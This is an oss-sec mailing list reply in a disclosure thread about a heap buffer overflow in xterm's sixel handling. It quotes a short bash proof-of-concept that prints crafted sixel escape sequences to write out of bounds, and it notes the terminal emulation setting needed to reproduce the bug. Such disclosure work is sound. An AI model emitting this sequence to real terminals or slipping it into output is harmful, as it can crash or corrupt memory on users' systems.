oss-sec mailing list archives
Re: Re: xterm buffer overflow via crafted sixel
From: Jakub Wilk <jwilk () jwilk net>
Date: Mon, 31 Jan 2022 11:48:15 +0100
* Tavis Ormandy <taviso () gmail com>, 2022-01-30, 18:39:
I can repro here, here is a testcase: #!/bin/bash printf "\ePq" printf "#%hhu;2;%hhu;%hhu;%hhu" 0x41 100 100 100 printf "#%hhu!%u@" 0x41 0x7fffffff printf "#%hhu!%u@" 0x41 0x7fffffff printf "\e\\" That should wrap context->col, and write a 'A' to graphic->pixels oob in set_sixel. I use `XTerm*decTerminalID: vt382` in .Xresources, not sure if that matters.
I think it does. https://invisible-island.net/xterm/ctlseqs/ctlseqs.html#h3-Sixel-Graphics says "xterm [needs to be] configured as VT240, VT241, VT330, VT340 or VT382" for Sixels to be supported. And indeed, I can't reproduce the bug with the default emulation level (VT420).
If you don't want to tinker with your .Xresources for testing, you can use the -ti option instead.
-- Jakub Wilk
Current thread:
- xterm buffer overflow via crafted sixel nick black (Jan 30)
- Re: xterm buffer overflow via crafted sixel Tavis Ormandy (Jan 30)
- Re: Re: xterm buffer overflow via crafted sixel Jakub Wilk (Jan 31)
- Re: xterm buffer overflow via crafted sixel Salvatore Bonaccorso (Jan 30)
- Re: xterm buffer overflow via crafted sixel Tavis Ormandy (Jan 30)